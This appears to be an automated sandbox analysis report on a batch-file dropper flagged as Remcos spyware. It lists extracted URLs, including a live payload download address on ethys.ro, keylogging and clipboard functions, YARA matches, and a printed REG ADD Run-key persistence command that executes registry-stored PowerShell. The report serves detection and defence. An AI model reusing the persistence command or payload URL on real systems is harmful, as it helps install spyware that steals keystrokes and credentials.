                Source: msiexec.exe, 00000011.00000002.1943455048.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                Source: msiexec.exe, 0000000F.00000002.1967891153.0000000000554000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.netUJL
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DesusertionEndpoint=P
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
                Source: powershell.exe, 00000003.00000002.1453412594.0000013F80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000005.00000002.1633462897.0000000004A21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
                Source: powershell.exe, 00000005.00000002.1657579338.0000000005A86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000005.00000002.1657579338.0000000005A86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000005.00000002.1657579338.0000000005A86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DesusertionEndpoint=Edge-Prod-LAX31r5b&
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DesusertionEndpoint=Edge-Prod-LAX31r5c&
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://edd27623571fc427dc1f8d6ba04dd39f.clo.footprintdns.com/apc/trans.gif?b37f6b94dfddf29d58d90046
                Source: powershell.exe, 00000003.00000002.1453412594.0000013F81A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1453412594.0000013F8022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ethys.ro
                Source: msiexec.exe, 00000008.00000003.2715933734.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2763354092.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2753540863.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2743559628.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2723001197.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2735060631.0000000008A23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ethys.ro/
                Source: msiexec.exe, 00000008.00000003.2715933734.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2763354092.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2753540863.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2743559628.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2723001197.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2735060631.0000000008A23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ethys.ro/3/tVWTkim99.bin
                Source: msiexec.exe, 00000008.00000003.2715933734.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2763354092.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2753540863.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2743559628.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2723001197.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2735060631.0000000008A23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ethys.ro/3/tVWTkim99.binT
                Source: powershell.exe, 00000003.00000002.1453412594.0000013F8022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ethys.ro/Nonaddicting.qxdP
                Source: powershell.exe, 00000005.00000002.1633462897.0000000004B77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ethys.ro/Nonaddicting.qxdXRyl
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
                Source: powershell.exe, 00000005.00000002.1633462897.0000000004B77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000003.00000002.1453412594.0000013F80BB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: msiexec.exe, 0000000F.00000002.1968428859.00000000009D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_iAA
                Source: msiexec.exeString found in binary or memory: https://login.yahoo.com/config/login
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                Source: powershell.exe, 00000003.00000002.1476663613.0000013F90071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1657579338.0000000005A86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-09-10-14/PreSignInSettingsConfig.json
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=6c2de995c290b031854b
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=eafda5
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://rum18.perf.linkedin.com/apc/trans.gif?481b7caa9fdb7105b2103a8300811877
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://rum18.perf.linkedin.com/apc/trans.gif?d99a5c14daed171e4daf3a2c1226bd16
                Source: msiexec.exe, msiexec.exe, 00000011.00000002.1943455048.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: msiexec.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://www.office.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownHTTPS traffic detected: 81.180.144.124:443 -> 192.168.2.9:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 81.180.144.124:443 -> 192.168.2.9:49925 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: C:\Windows\SysWOW64\msiexec.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\msiexec.exeJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0041183A OpenClipboard,GetLastError,15_2_0041183A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,15_2_0040987A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_004098E2
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,16_2_00406DFC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,16_2_00406E9F
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,17_2_004068B5
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,17_2_004072B5

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 00000008.00000003.2715933734.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1938405710.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2717142633.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2723953123.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2715933734.0000000008A44000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2744406884.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2763354092.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2741127584.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2753540863.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1913901918.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2768723852.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2715771259.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2743559628.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2723001197.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2754734091.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2735060631.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7800, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                System Summary

                barindex
                Source: amsi32_7580.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7344, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7580, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\SysWOW64\msiexec.exeProcess Stats: CPU usage > 49%
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00401806 NtdllDefWindowProc_W,15_2_00401806
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004018C0 NtdllDefWindowProc_W,15_2_004018C0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004016FD NtdllDefWindowProc_A,16_2_004016FD
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004017B7 NtdllDefWindowProc_A,16_2_004017B7
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_00402CAC NtdllDefWindowProc_A,17_2_00402CAC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_00402D66 NtdllDefWindowProc_A,17_2_00402D66
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF887AFB0F63_2_00007FF887AFB0F6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF887AFBEA23_2_00007FF887AFBEA2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF887AF212D3_2_00007FF887AF212D
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044B04015_2_0044B040
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0043610D15_2_0043610D
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044731015_2_00447310
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044A49015_2_0044A490
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0040755A15_2_0040755A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0043C56015_2_0043C560
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044B61015_2_0044B610
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044D6C015_2_0044D6C0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004476F015_2_004476F0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044B87015_2_0044B870
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044081D15_2_0044081D
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0041495715_2_00414957
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004079EE15_2_004079EE
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00407AEB15_2_00407AEB
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044AA8015_2_0044AA80
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00412AA915_2_00412AA9
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00404B7415_2_00404B74
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00404B0315_2_00404B03
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044BBD815_2_0044BBD8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00404BE515_2_00404BE5
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00404C7615_2_00404C76
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00415CFE15_2_00415CFE
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00416D7215_2_00416D72
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00446D3015_2_00446D30
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00446D8B15_2_00446D8B
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00406E8F15_2_00406E8F
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0040503816_2_00405038
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0041208C16_2_0041208C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004050A916_2_004050A9
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0040511A16_2_0040511A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0043C13A16_2_0043C13A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004051AB16_2_004051AB
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0044930016_2_00449300
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0040D32216_2_0040D322
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0044A4F016_2_0044A4F0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0043A5AB16_2_0043A5AB
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0041363116_2_00413631
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0044669016_2_00446690
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0044A73016_2_0044A730
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004398D816_2_004398D8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004498E016_2_004498E0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0044A88616_2_0044A886
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0043DA0916_2_0043DA09
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00438D5E16_2_00438D5E
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00449ED016_2_00449ED0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0041FE8316_2_0041FE83
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00430F5416_2_00430F54
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_004050C217_2_004050C2
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_004014AB17_2_004014AB
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0040513317_2_00405133
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_004051A417_2_004051A4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0040124617_2_00401246
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0040CA4617_2_0040CA46
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0040523517_2_00405235
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_004032C817_2_004032C8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0040168917_2_00401689
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_00402F6017_2_00402F60
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004169A7 appears 87 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0044DB70 appears 41 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004165FF appears 35 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00422297 appears 42 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00444B5A appears 37 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00413025 appears 79 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00416760 appears 69 times
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)"
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5969
                Source: unknownProcess created: Commandline size = 5993
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5969Jump to behavior
                Source: amsi32_7580.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7344, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7580, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal100.troj.spyw.evad.winBAT@22/14@10/3
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,15_2_004182CE
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,17_2_00410DE1
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,15_2_00418758
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,15_2_00413D4C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource,15_2_004148B6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Trykimprgneredes.EneJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7260:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
                Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-I42HQ2
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7352:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x45nip12.f4u.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ZW_PCCE-010023024001.bat" "
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs"
                Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: HandleInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7344
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7580
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: msiexec.exe, msiexec.exe, 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
